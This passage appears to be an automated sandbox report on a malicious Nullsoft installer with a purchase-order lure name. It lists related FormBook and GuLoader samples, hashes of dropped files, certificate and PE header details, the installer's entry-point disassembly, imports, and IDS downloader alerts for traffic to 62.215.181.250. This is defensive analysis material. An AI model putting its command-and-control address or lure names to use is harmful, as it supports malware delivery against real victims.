37f463bf4616ecd445d4a1937da06e19 | 2DpxPyeiUv.exe | malicious | Stealc, Vidar | 62.215.181.250
 | PO-000041522.exe | malicious | FormBook | 62.215.181.250
 | PO-000041522.exe | malicious | FormBook | 62.215.181.250
 | rRFQSMRT-241883-2024.exe | malicious | FormBook, GuLoader | 62.215.181.250
 | DividasAtivas_tgj.vbs | malicious | Unknown | 62.215.181.250
 | ZAPYTANIE OFERTOWE ST-2024-S315 CPA9170385.exe | malicious | CryptOne, Snake Keylogger, VIP Keylogger | 62.215.181.250
 | audiosrv.dll | malicious | Matanbuchus | 62.215.181.250
 | audiosrv.dll | malicious | Matanbuchus | 62.215.181.250
 | yolo.dll | malicious | Unknown | 62.215.181.250
 | Markus-Dokumenten-Kaufvertrag.vbs | malicious | GuLoader, Remcos | 62.215.181.250
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\Temp\nsq8002.tmp\System.dll | PO-000041522.exe | malicious | FormBook
 | PO-000041522.exe | malicious | FormBook
 | SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe | malicious | Unknown
 | cuenta iban-ES65.exe | malicious | FormBook, GuLoader
 | cuenta iban-ES65.exe | malicious | GuLoader
 | cuenta iban-ES65.exe | malicious | FormBook, GuLoader
 | cuenta iban-ES65.exe | malicious | GuLoader
 | rResegregation.exe | malicious | FormBook, GuLoader
 | rResegregation.exe | malicious | GuLoader
 | W1nnerFree CS2.exe | malicious | LoaderBot, Xmrig
Process: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
File Type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category: dropped
Size (bytes): 11264
Entropy (8bit): 5.770803561213006
Encrypted: false
SSDEEP: 192:vPtkumJX7zB22kGwfy0mtVgkCPOsE1un:k702k5qpdsEQn
MD5: 2AE993A2FFEC0C137EB51C8832691BCB
SHA1: 98E0B37B7C14890F8A599F35678AF5E9435906E1
SHA-256: 681382F3134DE5C6272A49DD13651C8C201B89C247B471191496E7335702FA59
SHA-512: 2501371EB09C01746119305BA080F3B8C41E64535FF09CEE4F51322530366D0BD5322EA5290A466356598027E6CDA8AB360CAEF62DCAF560D630742E2DD9BCD9
Malicious: false
Antivirus:
• Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:
• Filename: PO-000041522.exe, Detection: malicious
• Filename: PO-000041522.exe, Detection: malicious
• Filename: SecuriteInfo.com.Program.Unwanted.1283.21599.30651.exe, Detection: malicious
• Filename: cuenta iban-ES65.exe, Detection: malicious
• Filename: cuenta iban-ES65.exe, Detection: malicious
• Filename: cuenta iban-ES65.exe, Detection: malicious
• Filename: cuenta iban-ES65.exe, Detection: malicious
• Filename: rResegregation.exe, Detection: malicious
• Filename: rResegregation.exe, Detection: malicious
• Filename: W1nnerFree CS2.exe, Detection: malicious
Reputation: moderate, very likely benign file
Process: C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
File Type: data
Category: dropped
Size (bytes): 149100
Entropy (8bit): 4.5927109777566155
Encrypted: false
SSDEEP: 3072:n/fnJh9wbYm/+4bdKB2UAj++eFMf/XQMWVwv:X9wbYs+4bwtI4jwv
MD5: 421A6E691BF1E11F6269EBA35642D518
SHA1: CCAEBD5063934644EDCE97B06A593F31D00AE4E6
SHA-256: 4730C80B0C78B905D42BE22E39BB0553FF66D18FE3F72E956EE95C4E425516B6
SHA-512: 9EA15D0B75F3A9F455BD25ECFD3A1AAB7764C528A8C2092B73F0C2226DFFB8666873EAAC6A86C30FF44431C93090ADCDAA911AA3AF2825B3542B48C5F92ACFB2
Malicious: false
Reputation: low
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):489577
                                                                    Entropy (8bit):1.2547186421876628
                                                                    Encrypted:false
                                                                    SSDEEP:1536:E/ujv57uZhomnVCSJm9XbVL7qQ/NAq6gusqocKJjh8zOdV:E/67S/n5mpLH/RusDlT
                                                                    MD5:917EE012CBF9DD581CA73C76C7FE4CA0
                                                                    SHA1:0C99AC2CAEED895B940935D72A2A5FD3176D8C85
                                                                    SHA-256:09B342C70E64D68438917385DD67258EF7C4A2E4D6ED923BC52525A40540698A
                                                                    SHA-512:AE2552898CA689DE35FC21E6F36E38CF1B2F6CE623B70CA4EF4FF5B18DB863059CBE8EADEEA9A18CEEAD756AC4B25E812F52B012E6E32CBC3F26C18393259324
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):371165
                                                                    Entropy (8bit):1.2513716385265512
                                                                    Encrypted:false
                                                                    SSDEEP:768:Sj9TDV4iwR5i6JNPLINN0L+xs+EkTFvjCbJt1zs8kCmx+87wymjP6IzDWZ0rQPyQ:Asy0kRS/GkjABLBfp92S
                                                                    MD5:C639B5AEA098D21378EFE3AD3A554633
                                                                    SHA1:0E10CDE4A6AD7B89BB3FD1628C6D025BF466989B
                                                                    SHA-256:28FA6948793CA0E3C62F408CD9E546169C227B17F96C9CF3B9112E6980A503A1
                                                                    SHA-512:8312B421FC185D5ECBE5ED3854F9B54589F3142214196DF8EC8DAA71911F06F04283ED9EEA1DE213CD5B03EBA9AB1DDC95F39685E737201519FD9DC5369164EE
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):474733
                                                                    Entropy (8bit):1.2605066942170449
                                                                    Encrypted:false
                                                                    SSDEEP:1536:Kps3n4nM/CfcQfsOj6JcTW81rboM0aADXq34CpG0OC:Cenqxv0OBTpQMLo
                                                                    MD5:D52ECA89A6A6583AA5868C668B52F497
                                                                    SHA1:82BF52ABA58EDBB83EBB92C01EAAC9CA37189D9F
                                                                    SHA-256:0ECDFEF080A86A8F200ED06CA6067273A1105F1914DEAE7D92E09B873ABCF83C
                                                                    SHA-512:6607B8EBB9CC607D3531799052DC6F4F478E4326B5E6E803401E545DD5338815FA80B6E6E61509C1BA2B5719F6A80A681B7EA101540979A4C7D52863D8831E24
                                                                    Malicious:false
                                                                    Reputation:low
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:Matlab v4 mat-file (little endian) , numeric, rows 0, columns 0
                                                                    Category:dropped
                                                                    Size (bytes):227593
                                                                    Entropy (8bit):1.245920806085396
                                                                    Encrypted:false
                                                                    SSDEEP:768:3FhKKzByuBwwTbYXu9OgQhU0e6nWp1ZWY4+7j8nc+kf5GfMw1ZK8In+/JNS3xOnr:SepZWYpAGLQIM+q
                                                                    MD5:9A1B6F2854A5B3F5E97159F4D30C47B3
                                                                    SHA1:C9B33BDD32498DCCB62D229C95608AD0F8655BA3
                                                                    SHA-256:6A5ECDC720F8A9DC660732354490F997C5D46C1E7BDF97FE0129D31D5C231021
                                                                    SHA-512:4F74B2F52F66768B670DD65D42414464630C99637004A7560DDFCB52CEA706A659EA4F382C169DB740B8DD59BC15FE604F0A6F2B3164EE3D09046AAC83C6FD53
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):327412
                                                                    Entropy (8bit):1.2530468011510671
                                                                    Encrypted:false
                                                                    SSDEEP:768:aBILyFjGgwtorVDke1ghsijjk5HkK7lHTeeVybsz2dzpMuDx+Hmoy1f4fZDXCTqJ:94bZ/PRHoZSZdGU6lJ8/fqAGC
                                                                    MD5:EB81829745DF6650D0C09CBADCADB6FD
                                                                    SHA1:4FA3AA68D878034C8AAF56013C403A0540B93AF4
                                                                    SHA-256:9DD8E06CAF3EA5960465EB5466FE13ED3F41FE276C1D7314373ECF3993DFB992
                                                                    SHA-512:7EFE0B56249B05AFB8AA1C6EFABC773E65D19ABD773F3F462691539F4DCA5AF06B0F7A291FE1E3F4B535A01D7A34E6ACB6C720F0A6C1959FB871635F68463CD3
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):364
                                                                    Entropy (8bit):4.3235645552878115
                                                                    Encrypted:false
                                                                    SSDEEP:6:oiK7uqJ3jJ/b1w8IDz5E1WZVpVMmhE4HBFqTZWMWFXijWYBLSWDuPM5iSubpQpZu:oh7uSW68ZVpVekB6ZWMWdgrvDY+inyAT
                                                                    MD5:C2A47524DCF9687FA180FA2E3F8A4362
                                                                    SHA1:1C6D3ACC056ECECE019DE3EE9977DA451E4A6379
                                                                    SHA-256:FDBBF1DFDC69C2B28CFF480273FB9D83A217D699D708105B7166CD0BE5627218
                                                                    SHA-512:DE30697525C80EE8D1DCE3437374D83A6CA49C8CF11C73BDE2DEB26CA40B1F7ED7298F0871A8F32770C16F8CC944A2072CF4906CF130F50A9F4AB4C30E557E2C
                                                                    Malicious:false
                                                                    Preview:sheitan interruptable lsesummen,mercurialising engage rilievo fringe dobbeltdomicilernes chionodoxa chromascope,udreder leveraging lippering.bldsden vagtselskabers dentalized prussianised demifusion nachas..reboards skildvagter versiculi planetarily seksualhygiejnens bryllupsmarchens..strophe transformative unshapenly pharmacopeial afskedshilsners udsalgssteder.
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):264011
                                                                    Entropy (8bit):1.2602368630758787
                                                                    Encrypted:false
                                                                    SSDEEP:768:x1U384UpGgVCi2XHks9XVNargfQMkIRUpbvS2h2BjyujykSAtE1blsA9IiPi9OhW:x1Uz+6EuhMbJkzpAq+Kk0
                                                                    MD5:D9EB4DA16650571C58C1B347FB8D27F1
                                                                    SHA1:C02B382B23D249C7FAAF45D8191F64871FA025A5
                                                                    SHA-256:17A67A6731D1EF2DFE9C0A1E52CA0589968E9F61FF52FBE67B39DC3E39D36CFF
                                                                    SHA-512:B437679FD218DBC6CDA0C1EA598B597389E34BBAA3DE913CFEC564E226D3D55E84B4290CA076A6DC66E7018EE95AE1EE6007DB19F87DC68B459FCAFAF34D8E9D
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):438970
                                                                    Entropy (8bit):1.254355464810577
                                                                    Encrypted:false
                                                                    SSDEEP:768:bzV5RkJ99odavaG4W/vwV9bW9Iy6F5XTP/BtOax/XXluFr9jT6nHttP+Uf6FAqj3:P/vAoMGFHEUaviFWCDH1M5AOfE
                                                                    MD5:CA0365FACD33769129F762C843983283
                                                                    SHA1:E6C95B658A13E598AE6AF5F71A0D577C84BE7B26
                                                                    SHA-256:C8ED8546722F12C51800EDAEB09F659B59CFA6B8B8E3B0FDC55267A7E5560A20
                                                                    SHA-512:AE3ED0C51571CC90F65A8E58744E4002302E43B3D40E71C87A0223DEB7E9C5DFD1370C0AB1262E12F900E6A85C5CEA82B115D5EC8697CEF9F5EFAF555D2153C7
                                                                    Malicious:false
                                                                    Process:C:\Users\user\Desktop\PO-10212024168877 PNG2023-W101.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):397463
                                                                    Entropy (8bit):7.6041948582257115
                                                                    Encrypted:false
                                                                    SSDEEP:6144:TwUNcvIcaJuDN7kf9ayFt2D2ilY/wqavY/WXMOSZyGwXRCgdSdPv:M7v7Cmm91DwqZ/GM1wBCWSRv
                                                                    MD5:02E622DDF81785F4767032D5E8DB7262
                                                                    SHA1:8A2DD01E7CA1A096A421D3FF6E052567A37F84E9
                                                                    SHA-256:C413FCB833CA6BD78CC195FA4DB14256FB79592475DB91B0FBA932D333D536B8
                                                                    SHA-512:AB617A8710FA80715F567DD03B45B209FB1999EBDBFDA263CAEFE65F01C6E744912BD4BFA291DF6B6AAB351A2E7C0E1825470676FFF21524083E7BC6DEC8EA80
                                                                    Malicious:false
                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                    Entropy (8bit):7.985778364989345
                                                                    TrID:
                                                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:PO-10212024168877 PNG2023-W101.exe
                                                                    File size:918'336 bytes
                                                                    MD5:e7504a48d78545ef459890b5c36b6b17
                                                                    SHA1:7dd9b7b12c2a58f83235edd771801bae8b94b6f3
                                                                    SHA256:7d0590445da76f1149aefce04bc517b15b330871cd3bd8c196a032e28588ee9e
                                                                    SHA512:debd95e4955e2d07459336bd572df515aa0baffbdc736ea4ea0e0214b3d88e8d75c94f955090f6b65cfbc31456704b01371194d768f56f25363a9801fc7b7424
                                                                    SSDEEP:24576:LC84KQgxA541tRNeB+ihvheI+op15CQN08KXQoGxq:dNxA54rRwB+ihj+HQk98q
                                                                    TLSH:0E15236255FD5A03F336A2708D6F7B5A5CB72DC0083310376B223B665C3EAE9B21596C
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@............/...........s.../...............+.......Rich............................PE..L....c.W.................^....9....
                                                                    Icon Hash:43caa1a1a185ada9
                                                                    Entrypoint:0x4030ec
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:true
                                                                    Imagebase:0x400000
                                                                    Subsystem:windows gui
                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                    Time Stamp:0x5795637F [Mon Jul 25 00:55:27 2016 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:b78ecf47c0a3e24a6f4af114e2d1f5de
                                                                    Signature Valid:false
                                                                    Signature Issuer:CN=Fellifluous, O=Fellifluous, L=Noyal-sur-Vilaine, C=FR
                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                    Error Number:-2146762487
                                                                    Not Before:29/11/2023 05:29:46
                                                                    Not After:28/11/2026 05:29:46
                                                                    Subject Chain
                                                                    • CN=Fellifluous, O=Fellifluous, L=Noyal-sur-Vilaine, C=FR
                                                                    Version:3
                                                                    Thumbprint MD5:BB730EF06FEAC92031A32EB3E64DA9D7
                                                                    Thumbprint SHA-1:94015799792140B863341F079827FE8696F4FD67
                                                                    Thumbprint SHA-256:24E7F2711FAB55DD21662745411BA6363E016C6367C4634E2C5CA47EF46E4580
                                                                    Serial:1B5AEF7D872DDCBC040160974F2262F5E2404F23
                                                                    Instruction
                                                                    sub esp, 00000184h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    xor ebx, ebx
                                                                    push 00008001h
                                                                    mov dword ptr [esp+18h], ebx
                                                                    mov dword ptr [esp+10h], 00409198h
                                                                    mov dword ptr [esp+20h], ebx
                                                                    mov byte ptr [esp+14h], 00000020h
                                                                    call dword ptr [004070A8h]
                                                                    call dword ptr [004070A4h]
                                                                    cmp ax, 00000006h
                                                                    je 00007F2D355563D3h
                                                                    push ebx
                                                                    call 00007F2D35559341h
                                                                    cmp eax, ebx
                                                                    je 00007F2D355563C9h
                                                                    push 00000C00h
                                                                    call eax
                                                                    mov esi, 00407298h
                                                                    push esi
                                                                    call 00007F2D355592BDh
                                                                    push esi
                                                                    call dword ptr [004070A0h]
                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                    cmp byte ptr [esi], bl
                                                                    jne 00007F2D355563ADh
                                                                    push ebp
                                                                    push 00000009h
                                                                    call 00007F2D35559314h
                                                                    push 00000007h
                                                                    call 00007F2D3555930Dh
                                                                    mov dword ptr [007A1F44h], eax
                                                                    call dword ptr [00407044h]
                                                                    push ebx
                                                                    call dword ptr [00407288h]
                                                                    mov dword ptr [007A1FF8h], eax
                                                                    push ebx
                                                                    lea eax, dword ptr [esp+38h]
                                                                    push 00000160h
                                                                    push eax
                                                                    push ebx
                                                                    push 0079D500h
                                                                    call dword ptr [00407174h]
                                                                    push 00409188h
                                                                    push 007A1740h
                                                                    call 00007F2D35558F37h
                                                                    call dword ptr [0040709Ch]
                                                                    mov ebp, 007A8000h
                                                                    push eax
                                                                    push ebp
                                                                    call 00007F2D35558F25h
                                                                    push ebx
                                                                    call dword ptr [00407154h]
                                                                    Programming Language:
                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
--- | --- | --- | ---
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x7428 | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3be000 | 0xe18 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0xdf100 | 0x1240 | .data
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x7000 | 0x298 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
--- | --- | --- | --- | --- | --- | --- | --- | --- | ---
.text | 0x1000 | 0x5db6 | 0x5e00 | f367801e476b699be2b532039e0b583c | False | 0.6806848404255319 | data | 6.508470969322742 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x7000 | 0x1246 | 0x1400 | 43fab6a80651bd97af8f34ecf44cd8ac | False | 0.42734375 | data | 5.005029341587408 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x9000 | 0x399038 | 0x400 | 29ebcbec0bd7bd0fecb3d2937195c560 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x3a3000 | 0x1b000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x3be000 | 0xe18 | 0x1000 | bfb4537f3eb7566a74ccdeac7c775284 | False | 0.352783203125 | data | 3.842480295105669 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
--- | --- | --- | --- | --- | --- | ---
RT_ICON | 0x3be208 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | United States | 0.23655913978494625
RT_DIALOG | 0x3be4f0 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x3be5f0 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x3be710 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x3be7d8 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x3be838 | 0x14 | data | English | United States | 1.15
RT_VERSION | 0x3be850 | 0x288 | data | English | United States | 0.5108024691358025
RT_MANIFEST | 0x3bead8 | 0x33d | XML 1.0 document, ASCII text, with very long lines (829), with no line terminators | English | United States | 0.5536791314837153
DLL | Import
--- | ---
KERNEL32.dll | SetEnvironmentVariableA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, GetFileAttributesA, SetFileAttributesA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, ExitProcess, GetFullPathNameA, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, GlobalUnlock, GetDiskFreeSpaceA, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
USER32.dll | ScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
ADVAPI32.dll | RegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
--- | --- | ---
English | United States |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
--- | --- | --- | --- | --- | --- | --- | --- | ---
2024-10-29T20:37:35.807943+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49976 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:37.732080+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49977 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:39.641205+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49978 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:41.591458+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49979 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:43.528233+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49980 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:45.434865+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49981 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:47.357938+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49982 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:49.306233+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49983 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:51.423389+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49984 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:53.374891+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49985 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:55.330913+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49986 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:57.283182+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49987 | 62.215.181.250 | 443 | TCP
2024-10-29T20:37:59.264188+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49988 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:01.187500+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49989 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:03.399785+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49990 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:06.396302+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49991 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:08.666816+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49992 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:10.646802+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49993 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:12.581802+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49994 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:14.525452+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49995 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:16.488780+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49996 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:18.423095+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49997 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:21.363149+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49998 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:23.299165+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49999 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:25.234889+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50000 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:27.329904+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50001 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:29.261822+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50002 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:31.728462+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50003 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:33.685339+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50004 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:35.854783+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50005 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:37.784102+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50006 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:39.728615+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50007 | 62.215.181.250 | 443 | TCP
2024-10-29T20:38:41.651229+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 50008 | 62.215.181.250 | 443 | TCP
